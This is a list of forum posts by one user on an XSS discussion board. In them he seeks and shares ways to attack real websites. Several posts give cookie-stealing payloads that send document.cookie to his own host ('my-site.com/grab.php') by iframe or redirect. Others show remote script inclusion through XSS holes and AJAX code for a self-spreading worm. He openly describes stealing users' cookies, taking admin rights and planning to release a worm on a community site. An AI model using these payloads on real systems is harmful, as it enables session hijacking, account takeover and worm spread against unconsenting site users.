sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Results 1 - 30 of 43
3 years ago
Ryonan
Hello everyone, recently I found a website that comes with an XSS, but the problem is when I try to run the page in an iframe, it's not possible because it has this script in its source. ########## <SCRIPT> if (top.location != self.location) { top.location = self.location; } window.focus(); </SCRIPT> ################ And now I think of loadi
Forum: XSS Info
4 years ago
Ryonan
XSS in vBulletin? I don't think this is possible.
Forum: XSS Info
4 years ago
Ryonan
What's that language? Eskimor??
Forum: XSS Info
4 years ago
Ryonan
lol, can somebody explain it?
Forum: XSS Info
4 years ago
Ryonan
As long as you have the frame in the XSS page, you can read its contents.
Forum: XSS Info
4 years ago
Ryonan
Hello, I stole the cookie of a user, but I can't log in right away with: javascript:document.cookie="user=1;password=434rerdsd343;" Instead, I have to enter them one by one, first with user, and then with password, to log in.
Forum: XSS Info
4 years ago
Ryonan
Hahaha, that's incredible... I don't know if someone needs this, but if you change the inner HTML of any object on the victim's site into a frame, you will need to wait a little while for the frame to load, and then you can read the content of that frame. And here is the simple script: ################################################ setTimeout('alert(document.frames["hello"].document
Forum: XSS Info
4 years ago
Ryonan
Yes, I know you guys talked about this in some older thread. I did try, but it doesn't work. Here is my case: I use XSS to change a text into a frame (by innerHTML), and then try to read the content of that frame, but it seems hopeless. What I tried: alert(parent.document.frames['new_frame'].body.innerHTML); Thanks for your help!
Forum: XSS Info
4 years ago
Ryonan
Thank you guys for the links, but they don't work. Weird!
Forum: XSS Info
4 years ago
Ryonan
Hi, I recently came to know a site that needs the check box to be checked to do the AJAX request, but I don't know how to do this. Here is what I tried: &check=checked &checked=1 #checked=true but none of them work. Thanks
Forum: XSS Info
4 years ago
Ryonan
Haha, that's a very kind explanation. Thank you sidircat
Forum: XSS Info
4 years ago
Ryonan
Oh my god, I can't believe it! You saved my day... but will you kindly explain to me why we would escape the cookie to receive it all? Thanks a lot.
Forum: XSS Info
4 years ago
Ryonan
Hello, I recently found an XSS bug and I don't want to make any phishing or fake login. I did change the innerHTML of a div tag on the site into a frame like to my cookie logger like this: <iframe src=http://my-site.com/index.php?record=+parent.document.cookie> but what I receive is only the PHP session (PHPSESSID=blah blah). I will receive all the cookie when I do: document.location=
Forum: XSS Info
4 years ago
Ryonan
After searching a while, the final solution is the same as my prediction. Thanks anyway
Forum: XSS Info
4 years ago
Ryonan
Hello, I found an XSS hole on a site. They do nothing to prevent it but UPPERCASE all the input characters, so JavaScript won't even work. I can put a frame on it, but I don't know if there is a way to bypass this?
Forum: XSS Info
4 years ago
Ryonan
I think there is no way to do so.
Forum: XSS Info
4 years ago
Ryonan
Nice job Ron :d. I made something similar to that months ago; the victim is an online community, but they don't seem to care much about the worm.
Forum: XSS Info
4 years ago
Ryonan
You can use something like this: '<iframe src=http://my-site.com/grab.php?s='+parent.document.cookie+'>'; Another solution that works for me: document.location="http://my-site.com/grab.php?s=document.cookie; In your grab page, after writing the cookie, place this code: document.location="http://victim-site.com" The browser will make this fast enough so they can hard
Forum: XSS Info
4 years ago
Ryonan
Hello, I've found an XSS on a well-known site. The XSS is in the index page, which has nothing to do with infection, but there is a forum on an add-on domain like this: index page: http://site.com/s=XSS forum: http://site.com/forum My question is: can I use XSS to ask the user to post some topics in the forum? I think the POST request in AJAX will be something like: ####################
Forum: XSS Info
5 years ago
Ryonan
I am not sure, but some of your questions can be answered by searching on this forum or with Google. One thing for sure is that XSS is extremely dangerous. The modern XSS is the handshake between classic XSS and AJAX, and CSRF maybe.
Forum: XSS Info
5 years ago
Ryonan
Yes, that's bad news. I did see dozens of sites keep me out from using XSS with only quotes encoded.
Forum: XSS Info
5 years ago
Ryonan
No, I can't access the page with a fake cookie. They must have used the session to prevent that, but I just can't give up on an XSS like that. I have a question: does AJAX work on a subdomain? I have an XSS bug at a.site.com; will the script be executed at b.site.com, and must I specify the URL? Thanks
Forum: XSS Info
5 years ago
Ryonan
Hello, I've just found an XSS hole on a great site and am trying to steal the user's cookie, but I can't put my own cookie back after logging out to log in again. The site has SSL; I think that's the point. Here is the cookie: ###################################################### PHPSESSID=nohr046i2ngj4fcggck3irqfc0; __utmc=95862039; __utma=95862039.744283387.1252155967.1252155967.1252155967.1;
Forum: XSS Info
5 years ago
Ryonan
PaPPy, you've just trained me an attacker. Actually, I found an online community with a very serious XSS hole, allowing me to take their admin rights (my previous topic). I tried to inform them but they do very little to fix it, and now with the new hole, I'll have an XSS worm there. With the power of AJAX, my worm will change the user's display name, their status text, auto and non-stop sending message t
Forum: XSS Info
5 years ago
Ryonan
Thanks pappy, barbarianbob for your reply. There is a small question left... that's how can I have many POST requests in the same AJAX script? Searching around, Google said that I must create as many requests as I want to send. Thx
Forum: XSS Info
5 years ago
Ryonan
Thanks for your reply. From your post I see we can use AJAX in a remote JavaScript file which is stored on another server, right? And can you help me a bit here: ######################### ajaxRequest.onreadystatechange = function(){ if(ajaxRequest.readyState == 4){ alert("ok"); // THIS ALERT BOX CANNOT BE FIRED SO I GUESS THE PROBLEM IS THE CONNECTION CANNOT BE ESTABLISHED /
Forum: XSS Info
5 years ago
Ryonan
Hello, I wonder if the AJAX can run from another server. I mean, if I have #################################################################### http://site1.com/AJAX.js , can it run through an XSS hole in http://site2.com/?XSS=<script src="http://site1.com/AJAX.js"></script> #################################################################### Thanks.
Forum: XSS Info
5 years ago
Ryonan
Thanks for the reply, but it's still hard to figure this out. Here is my AJAX code; it just tries to send a POST request to the server in order to leave a message: ################################ <body onLoad="ajax()"> <script> function ajax(){ alert(1); var ajaxRequest; // The variable that makes Ajax possible! try{ // Opera 8.0+, Firefox, Safari ajaxReq
Forum: XSS Info
5 years ago
Ryonan
Hello, I've just read Pappy's document here: http://docs.google.com/Doc?id=df6vnh4w_10fdwpg8ff. It's really great, but I have a question: can I use <script src=http://mysite.com/AJAX-WORM.js> through an XSS hole? Or must I put in an iframe which contains that script? Thanks.
Forum: XSS Info
5 years ago
Ryonan
Yes. I still wonder why. Maybe they use some JavaScript in the index page to protect their cookie from being written. I'll check that again.
Forum: XSS Info